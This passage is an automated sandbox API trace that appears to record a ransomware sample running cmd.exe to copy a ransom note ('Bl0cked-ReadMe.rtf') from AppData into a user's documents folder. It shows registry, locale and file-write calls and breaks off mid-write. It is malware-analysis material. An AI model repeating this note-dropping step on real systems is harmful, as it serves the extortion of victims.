start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12499 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12500 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12501 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12502 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12503 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12504 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12505 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12542 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12543 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12544 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12545 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12546 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12547 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12548 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12549 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12550 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12551 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12552 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12553 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12554 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 12555 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12556 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12557 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12558 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 12559 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12560 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12561 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 12562 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12563 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 173 os_tid = 0xbdc [0132.605] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe0c | out: lpSystemTimeAsFileTime=0x26fe0c*(dwLowDateTime=0x88f85dc0, dwHighDateTime=0x1d440a9)) [0132.605] GetCurrentProcessId () returned 0xb58 [0132.605] GetCurrentThreadId () returned 0xbdc [0132.605] GetTickCount () returned 0x2a2e3 [0132.605] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe04 | out: lpPerformanceCount=0x26fe04*=18939433031) returned 1 [0132.606] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.606] __set_app_type (_Type=0x1) [0132.606] __p__fmode () returned 0x76b331f4 [0132.606] __p__commode () returned 0x76b331fc [0132.606] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.606] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.606] GetCurrentThreadId () returned 0xbdc [0132.606] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x38 [0132.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.606] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.606] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd9c | out: phkResult=0x26fd9c*=0x0) returned 0x2 [0132.606] VirtualQuery (in: lpAddress=0x26fdd3, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.606] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.606] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.607] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.607] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd6c, dwLength=0x1c | out: lpBuffer=0x26fd6c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0132.607] GetConsoleOutputCP () returned 0x1b5 [0132.607] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.607] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.607] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.607] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.608] GetEnvironmentStringsW () returned 0x2b0180* [0132.608] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0132.608] GetEnvironmentStringsW () returned 0x2b0180* [0132.608] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0132.608] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed0c | out: phkResult=0x26ed0c*=0x40) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0xa8, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x0, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegCloseKey (hKey=0x40) returned 0x0 [0132.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed0c | out: phkResult=0x26ed0c*=0x40) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x40, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x1, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x0, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.608] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.609] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x4, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x4) returned 0x0 [0132.609] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed14, lpData=0x26ed18, lpcbData=0x26ed10*=0x1000 | out: lpType=0x26ed14*=0x0, lpData=0x26ed18*=0x9, lpcbData=0x26ed10*=0x1000) returned 0x2 [0132.609] RegCloseKey (hKey=0x40) returned 0x0 [0132.609] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.609] srand (_Seed=0x5b886367) [0132.609] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0132.609] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0132.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.609] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.609] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.609] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.609] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.609] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.610] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.610] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.610] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.610] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.610] GetEnvironmentStringsW () returned 0x2b22d0* [0132.610] FreeEnvironmentStringsW (penv=0x2b22d0) returned 1 [0132.610] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.610] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.610] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.610] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.610] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.610] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.610] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.610] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fad8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.610] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fad8, lpFilePart=0x26fad4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fad4*="Desktop") returned 0x18 [0132.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.610] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.610] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.611] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.611] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f854 | out: lpFindFileData=0x26f854) returned 0x2b0010 [0132.611] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0132.611] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.611] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.611] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.611] GetEnvironmentStringsW () returned 0x2b2af0* [0132.611] FreeEnvironmentStringsW (penv=0x2b2af0) returned 1 [0132.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.612] GetConsoleOutputCP () returned 0x1b5 [0132.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.612] GetUserDefaultLCID () returned 0x409 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc18, cchData=128 | out: lpLCData="0") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc18, cchData=128 | out: lpLCData="0") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc18, cchData=128 | out: lpLCData="1") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.612] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.612] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.613] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.613] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.613] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.614] _wcsicmp (_String1="type", _String2=")") returned 75 [0132.614] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0132.614] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0132.614] _wcsicmp (_String1="IF", _String2="type") returned -11 [0132.614] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0132.614] _wcsicmp (_String1="REM", _String2="type") returned -2 [0132.614] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.618] GetFileType (hFile=0x7) returned 0x2 [0132.618] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fb10 | out: lpMode=0x26fb10) returned 1 [0132.618] _dup (_FileHandle=1) returned 3 [0132.618] _close (_FileHandle=1) returned 0 [0132.618] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0132.618] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26fae0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0132.619] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0132.619] GetConsoleTitleW (in: lpConsoleTitle=0x26f910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.620] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0132.620] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0132.620] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0132.620] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0132.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.620] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f474, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f474) returned 0x2a0e70 [0132.621] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0132.621] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0132.621] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0132.621] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e380, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0132.621] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] GetFileType (hFile=0x54) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e3d8 | out: lpFileSizeHigh=0x26e3d8*=0x0) returned 0x1632 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.621] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] GetFileType (hFile=0x4c) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] GetFileType (hFile=0x4c) returned 0x1 [0132.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.621] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] GetFileType (hFile=0x4c) returned 0x1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.622] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c 